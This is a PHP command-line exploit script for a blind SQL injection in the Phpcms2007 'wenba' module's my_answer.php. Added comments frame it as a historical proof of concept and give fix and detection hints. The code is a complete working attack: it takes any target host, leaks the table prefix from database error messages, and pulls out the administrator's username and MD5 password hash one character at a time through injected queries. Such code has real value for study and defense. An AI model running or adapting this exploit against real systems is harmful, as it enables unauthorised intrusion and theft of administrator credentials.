|
<?
// Historical proof-of-concept for the Phpcms2007 "wenba" module: a blind SQL
// injection through the `status` query parameter of wenba/my_answer.php, driven
// over raw HTTP from the command line. Kept here for defensive reference — the
// application-side fix is a parameterized query for `status` and not echoing
// database errors to the client.
// NOTE(review): uses the short open tag `<?`, which depends on short_open_tag.
print_r(' -------------------------------------------------------------------------------- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit BY oldjun[S.U.S](http://www.oldjun.com) -------------------------------------------------------------------------------- ');
// Usage banner: the script needs exactly two CLI arguments, host and path,
// and exits otherwise.
if ($argc<3) {
    print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- ');
    die;
}
// Sends one raw HTTP request ($packet, already a complete request text) to
// $host on port 80 and stores the full response — headers and body — in the
// global $html. Communicates through the globals $host and $html instead of
// parameters/return values, and terminates the process if the TCP connection
// cannot be opened. No explicit timeout is set on the socket, so a stalled
// target stalls the whole run.
function sendpacketii($packet) {
    global $host, $html;
    // gethostbyname() returns its argument unchanged on lookup failure, so a
    // bad hostname only surfaces as a failed fsockopen() below.
    $ock=fsockopen(gethostbyname($host),'80');
    if (!$ock) { echo 'No response from '.$host; die; }
    fputs($ock,$packet);
    $html='';
    // Read until the server closes the connection ("Connection: Close" is set
    // by every caller), accumulating the raw response.
    while (!feof($ock)) { $html.=fgets($ock); }
    fclose($ock);
}
// CLI inputs: target host (without scheme) and the web path of the phpcms root.
$host=$argv[1]; $path=$argv[2];
// Default table prefix; replaced later if the target's SQL error message
// leaks the real one.
$prefix="phpcms_";
// Hard-coded PHPSESSID; it is only attached to the first (prefix discovery)
// request, the later probes send no cookie.
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
// The path must begin and end with '/' so the request line assembled below is
// well formed. `<>` is PHP's loose inequality operator, equivalent to `!=`.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo "Error... check the path!\r\n\r\n"; die;}
/*get $prefix*/
// Prefix discovery: a deliberately malformed `status` value makes MySQL fail,
// and the page echoes the error text ("...in your SQL syntax...") including the
// original SQL. The table prefix is then read out of that text as whatever sits
// between "FROM " and "wenba_answer". Defensive takeaway: this step only works
// because verbose database errors are returned to the client — generic error
// pages / display_errors off remove the leak even before the injection is fixed.
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
// eregi() is the legacy case-insensitive POSIX regex function (removed in PHP 7).
if (eregi("in your SQL syntax",$html)) {
    $temp=explode("FROM ",$html);
    if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}
    // NOTE(review): $temp2 is only assigned inside the isset() branch above;
    // the next line reads it unconditionally.
    if($temp2[0]) $prefix=$temp2[0];
    echo "[+]prefix -> ".$prefix."\r\n";
}
echo "[~]exploting now,plz waiting...\r\n\r\n";
// Oracle sanity check: with a tautology (`or 1=1`) appended, the page is
// expected to list answers. The six bytes tested below appear to be the GBK
// encoding of 对不起 ("sorry"), the module's "no data" message; if that message
// is present even for a true condition, the true/false oracle cannot work and
// the script stops. The same byte sequence is the oracle in the loops below.
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"; die;}
// Boolean-based blind extraction of the password hash of userid=1, one
// character position ($j) per outer round. The candidate set is NUL plus
// '0'-'9' and 'a'-'f' (17 values), i.e. the script assumes the stored password
// is a 32-character hex MD5 digest (see is_hash() below), so each position
// costs at most 17 requests. Oracle: when the injected COUNT(*) comparison is
// true the page shows data; when false the "sorry" bytes come back.
// The outer loop ends once ASCII 0 is accepted — presumably SUBSTRING() past
// the end of the hash yielding an empty string — which strstr() finds as chr(0).
// Detection angle: a burst of GETs to wenba/my_answer.php whose `status` value
// carries `/**/` comment sequences and `ASCII(SUBSTRING(` is a clear signature.
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0))) {
    for ($i=0; $i<=255; $i++) {
        if (in_array($i,$chars)) {
            $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
            $packet.="Host: ".$host."\r\n";
            $packet.="Connection: Close\r\n\r\n";
            sendpacketii($packet);
            // No "sorry" message => the guessed byte is correct for this position.
            if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}
        }
        // 255 is not in $chars, so this is only reached when no candidate
        // matched at the current position.
        if ($i==255) {die("Exploit failed...");}
    }
    $j++;
}
// Same oracle as above for the username of userid=1, but over the full 0-255
// byte range because usernames are not limited to hex digits (up to 256
// requests per position). chr($i) appends a raw byte, so a multi-byte
// username is reproduced byte by byte; the loop again ends on ASCII 0.
$j=1;$username="";
while (!strstr($username,chr(0))) {
    for ($i=0; $i<=255; $i++) {
        $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Connection: Close\r\n\r\n";
        sendpacketii($packet);
        if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n";break;}
        // Reached only when the last candidate (255) did not match either.
        if ($i==255) {die("Exploit failed...");}
    }
    $j++;
}
// Result banner. The "32λ" in the literal is probably a mis-encoded character
// from the original source; it is part of the output string and left as is.
print_r(' -------------------------------------------------------------------------------- [+]username -> '.$username.' [+]password(md5 32λ) -> '.$password.' -------------------------------------------------------------------------------- ');
// Returns true when $hash, after trim(), starts with 32 lowercase hex
// characters — i.e. looks like an MD5 digest. trim()'s default character list
// includes "\0", so the NUL that ended the extraction loop is stripped first.
// The pattern is anchored only at the start; uses the legacy POSIX ereg(),
// which is case-sensitive.
function is_hash($hash) {
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    else {return false;}
}
// Verdict: a recovered value that parses as an MD5 hex digest counts as success.
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
|
|
|